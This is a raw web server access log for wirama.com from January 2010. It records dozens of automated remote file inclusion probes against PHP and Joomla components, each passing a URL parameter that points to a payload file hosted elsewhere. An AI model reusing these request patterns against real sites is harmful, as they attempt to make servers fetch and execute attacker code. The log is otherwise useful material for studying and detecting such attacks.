174.120.139.148 - - [01/Jan/2010:05:59:51 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.120.139.148 - - [01/Jan/2010:05:59:51 -0800] "GET /logs/access_090329.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
212.175.5.130 - - [01/Jan/2010:05:59:51 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
212.175.5.130 - - [01/Jan/2010:05:59:51 -0800] "GET /logs/access_090329.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
212.175.5.130 - - [01/Jan/2010:05:59:51 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
212.175.5.130 - - [01/Jan/2010:05:59:51 -0800] "GET /logs/access_090501.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.120.139.148 - - [01/Jan/2010:06:00:09 -0800] "GET /logs/access_090330.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
212.175.5.130 - - [01/Jan/2010:06:01:04 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
212.175.5.130 - - [01/Jan/2010:06:01:04 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
212.175.5.130 - - [01/Jan/2010:06:01:04 -0800] "GET /logs/access_090329.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.172.33.230 - - [01/Jan/2010:06:01:57 -0800] "GET /logs/access_090401.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
212.175.5.130 - - [01/Jan/2010:06:02:01 -0800] "GET /logs/access_090330.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.120.139.148 - - [01/Jan/2010:06:03:53 -0800] "GET /logs/access_090401.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.120.139.148 - - [01/Jan/2010:06:03:53 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.120.139.148 - - [01/Jan/2010:06:03:53 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.120.139.148 - - [01/Jan/2010:06:03:57 -0800] "GET /logs/access_090501.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.172.33.230 - - [01/Jan/2010:06:05:22 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.172.33.230 - - [01/Jan/2010:06:05:22 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.172.33.230 - - [01/Jan/2010:06:05:22 -0800] "GET /logs/access_090501.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.120.139.148 - - [01/Jan/2010:06:09:34 -0800] "GET /logs/access_090501.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.120.139.148 - - [01/Jan/2010:06:09:34 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.120.139.148 - - [01/Jan/2010:06:09:34 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.120.139.148 - - [01/Jan/2010:06:09:40 -0800] "GET /logs/access_090329.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.120.139.148 - - [01/Jan/2010:06:09:53 -0800] "GET /logs/access_090330.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.232.85.247 - - [01/Jan/2010:06:10:23 -0800] "GET /logs/access_091031.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.xenguide.pe.kr/log/plug_in_config/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
94.45.33.18 - - [01/Jan/2010:06:12:01 -0800] "GET /logs/access_090329.log HTTP/1.0" 200 1685256 "http://www.wirama.com/logs/access_090329.log" "Opera/9.00 (Windows NT 5.1; U; ru)" "www.wirama.com"
212.175.5.130 - - [01/Jan/2010:06:12:20 -0800] "GET /logs/access_090401.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
195.70.35.48 - - [01/Jan/2010:06:14:45 -0800] "GET /content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mafilm.hu/.injek/injek.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
64.151.247.1 - - [01/Jan/2010:06:17:15 -0800] "GET //components/com_virtuemart/virtuemart.cfg.php?mosConfig_absolute_path=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "wirama.com"
64.151.247.1 - - [01/Jan/2010:06:17:16 -0800] "GET /logs///components/com_virtuemart/virtuemart.cfg.php?mosConfig_absolute_path=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "wirama.com"
209.172.33.230 - - [01/Jan/2010:06:19:17 -0800] "GET /logs/access_090329.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
65.55.207.30 - - [01/Jan/2010:06:19:27 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
209.172.33.230 - - [01/Jan/2010:06:19:34 -0800] "GET /logs/access_090330.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
65.55.207.30 - - [01/Jan/2010:06:20:14 -0800] "GET /tmp/?D=A HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
211.230.148.68 - - [01/Jan/2010:06:21:20 -0800] "GET /logs/access_091101.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.xenguide.pe.kr/log/plug_in_config/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.230.148.68 - - [01/Jan/2010:06:21:20 -0800] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.xenguide.pe.kr/log/plug_in_config/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.230.148.68 - - [01/Jan/2010:06:21:20 -0800] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.xenguide.pe.kr/log/plug_in_config/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.230.148.68 - - [01/Jan/2010:06:21:29 -0800] "GET /logs/access_091031.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.xenguide.pe.kr/log/plug_in_config/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.230.148.68 - - [01/Jan/2010:06:21:49 -0800] "GET /logs/access_091201.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.xenguide.pe.kr/log/plug_in_config/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.230.148.68 - - [01/Jan/2010:06:21:49 -0800] "GET /logs/access_090731.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.xenguide.pe.kr/log/plug_in_config/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
212.175.5.130 - - [01/Jan/2010:06:23:05 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
212.175.5.130 - - [01/Jan/2010:06:23:05 -0800] "GET /logs/access_090501.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
212.175.5.130 - - [01/Jan/2010:06:23:05 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.55.143.249 - - [01/Jan/2010:06:23:10 -0800] "GET /logs/access_090731.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.55.143.249 - - [01/Jan/2010:06:23:10 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.55.143.249 - - [01/Jan/2010:06:23:10 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.55.143.249 - - [01/Jan/2010:06:23:10 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.55.143.249 - - [01/Jan/2010:06:23:10 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.55.143.249 - - [01/Jan/2010:06:23:10 -0800] "GET /logs/access_090731.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.55.143.249 - - [01/Jan/2010:06:23:14 -0800] "GET /logs/access_090501.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.55.143.249 - - [01/Jan/2010:06:23:14 -0800] "GET /logs/access_090501.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
212.175.5.130 - - [01/Jan/2010:06:23:41 -0800] "GET /logs/access_090329.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.55.143.249 - - [01/Jan/2010:06:24:01 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.55.143.249 - - [01/Jan/2010:06:24:01 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.55.143.249 - - [01/Jan/2010:06:24:01 -0800] "GET /logs/access_090401.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.55.143.249 - - [01/Jan/2010:06:24:09 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.55.143.249 - - [01/Jan/2010:06:24:09 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.55.143.249 - - [01/Jan/2010:06:24:09 -0800] "GET /logs/access_090401.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
212.175.5.130 - - [01/Jan/2010:06:24:11 -0800] "GET /logs/access_090330.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.55.143.249 - - [01/Jan/2010:06:24:30 -0800] "GET /logs/access_090401.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.55.143.249 - - [01/Jan/2010:06:24:30 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.55.143.249 - - [01/Jan/2010:06:24:30 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
78.110.50.121 - - [01/Jan/2010:06:24:32 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
78.110.50.121 - - [01/Jan/2010:06:24:32 -0800] "GET /logs/access_090401.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
78.110.50.121 - - [01/Jan/2010:06:24:33 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
78.110.50.121 - - [01/Jan/2010:06:24:33 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
78.110.50.121 - - [01/Jan/2010:06:24:33 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
78.110.50.121 - - [01/Jan/2010:06:24:33 -0800] "GET /logs/access_090401.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.55.143.249 - - [01/Jan/2010:06:24:36 -0800] "GET /logs/access_091101.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.55.143.249 - - [01/Jan/2010:06:24:37 -0800] "GET /logs/access_091101.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.55.143.249 - - [01/Jan/2010:06:25:03 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.55.143.249 - - [01/Jan/2010:06:25:03 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.55.143.249 - - [01/Jan/2010:06:25:03 -0800] "GET /logs/access_090401.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
78.110.50.121 - - [01/Jan/2010:06:25:28 -0800] "GET /logs/access_091101.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
78.110.50.121 - - [01/Jan/2010:06:25:31 -0800] "GET /logs/access_091101.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.55.143.249 - - [01/Jan/2010:06:26:12 -0800] "GET /logs/access_090401.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.55.143.249 - - [01/Jan/2010:06:26:12 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.55.143.249 - - [01/Jan/2010:06:26:12 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
78.110.50.121 - - [01/Jan/2010:06:26:20 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
78.110.50.121 - - [01/Jan/2010:06:26:20 -0800] "GET /logs/access_090401.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
78.110.50.121 - - [01/Jan/2010:06:26:20 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
78.110.50.121 - - [01/Jan/2010:06:27:10 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
78.110.50.121 - - [01/Jan/2010:06:27:10 -0800] "GET /logs/access_090401.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
78.110.50.121 - - [01/Jan/2010:06:27:10 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.55.143.249 - - [01/Jan/2010:06:27:26 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.55.143.249 - - [01/Jan/2010:06:27:26 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.55.143.249 - - [01/Jan/2010:06:27:26 -0800] "GET /logs/access_090401.log%20%20/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.55.143.249 - - [01/Jan/2010:06:27:27 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.55.143.249 - - [01/Jan/2010:06:27:27 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.55.143.249 - - [01/Jan/2010:06:27:27 -0800] "GET /logs/access_090401.log%20%20/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.55.143.249 - - [01/Jan/2010:06:27:37 -0800] "GET /logs/access_091031.log%20%20/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
78.110.50.121 - - [01/Jan/2010:06:27:39 -0800] "GET /logs/access_090401.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
78.110.50.121 - - [01/Jan/2010:06:27:39 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
78.110.50.121 - - [01/Jan/2010:06:27:39 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.55.143.249 - - [01/Jan/2010:06:27:41 -0800] "GET /logs/access_091031.log%20%20/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
195.70.35.48 - - [01/Jan/2010:06:28:32 -0800] "GET /logs/access_090330.log//content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mafilm.hu/.injek/injek.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
195.70.35.48 - - [01/Jan/2010:06:28:33 -0800] "GET /content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mafilm.hu/.injek/injek.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
195.70.35.48 - - [01/Jan/2010:06:28:33 -0800] "GET /logs//content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mafilm.hu/.injek/injek.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
78.110.50.121 - - [01/Jan/2010:06:32:28 -0800] "GET /logs/access_090401.log%20%20/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
78.110.50.121 - - [01/Jan/2010:06:32:28 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
78.110.50.121 - - [01/Jan/2010:06:32:28 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
78.110.50.121 - - [01/Jan/2010:06:32:44 -0800] "GET /logs/access_091031.log%20%20/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
78.110.50.121 - - [01/Jan/2010:06:33:44 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
78.110.50.121 - - [01/Jan/2010:06:33:44 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
